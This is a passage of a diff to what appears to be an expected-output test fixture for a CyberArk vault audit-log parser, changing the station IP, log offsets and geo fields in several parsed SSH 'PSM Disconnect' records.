-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:26</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:26</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 09:38:26",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "psm disconnect",
@@ -138,7 +133,7 @@
         "related.ip": [
             "127.0.0.1",
             "34.123.103.115",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
@@ -176,18 +171,13 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:47:01Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Disconnect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:47:01</Timestamp>\n    <IsoTimestamp>2021-03-11T17:47:01Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:47:01</Timestamp>\n    <IsoTimestamp>2021-03-11T17:47:01Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 09:47:01",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "psm disconnect",
@@ -209,7 +199,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 5222,
+        "log.offset": 5220,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "outbound",
@@ -220,7 +210,7 @@
         "related.ip": [
             "127.0.0.1",
             "34.123.103.115",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
@@ -258,18 +248,13 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:48:40Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Disconnect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:48:40</Timestamp>\n    <IsoTimestamp>2021-03-11T17:48:40Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:48:40</Timestamp>\n    <IsoTimestamp>2021-03-11T17:48:40Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 09:48:40",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "psm disconnect",
@@ -291,7 +276,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 7810,
+        "log.offset": 7806,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "outbound",
@@ -302,7 +287,7 @@
         "related.ip": [
             "10.0.2.2",
             "34.123.103.115",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
@@ -340,18 +325,13 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:55:02Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Disconnect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:55:02</Timestamp>\n    <IsoTimestamp>2021-03-11T17:55:02Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:55:02</Timestamp>\n    <IsoTimestamp>2021-03-11T17:55:02Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 09:55:02",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "psm disconnect",
@@ -373,7 +353,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 10396,
+        "log.offset": 10390,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "outbound",
@@ -384,7 +364,7 @@
         "related.ip": [
             "10.0.2.2",
             "34.123.103.115",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
@@ -422,18 +402,13 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:56:42Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Disconnect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:56:42</Timestamp>\n    <IsoTimestamp>2021-03-11T17:56:42Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:56:42</Timestamp>\n    <IsoTimestamp>2021-03-11T17:56:42Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 09:56:42",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "psm disconnect",
@@ -455,7 +430,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 12982,
+        "log.offset": 12974,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "outbound",
@@ -466,7 +441,7 @@
         "related.ip": [
             "10.0.2.2",
             "34.123.103.115",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
@@ -504,18 +479,13 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T20:23:30Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Disconnect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 12:23:30</Timestamp>\n    <IsoTimestamp>2021-03-11T20:23:30Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 12:23:30</Timestamp>\n    <IsoTimestamp>2021-03-11T20:23:30Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 12:23:30",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "adrian",
         "event.action": "psm disconnect",
@@ -537,7 +507,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 15568,
+        "log.offset": 15558,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "outbound",
@@ -548,7 +518,7 @@
         "related.ip": [
             "10.0.2.2",
             "34.123.103.115",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
@@ -587,23 +557,18 @@
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_duration": "00:00:18",
         "cyberarkpas.audit.extra_details.session_id": "d284c268-2ba0-4366-af52-e33459b073a1",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:49:54Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Disconnect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:54</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:54Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" 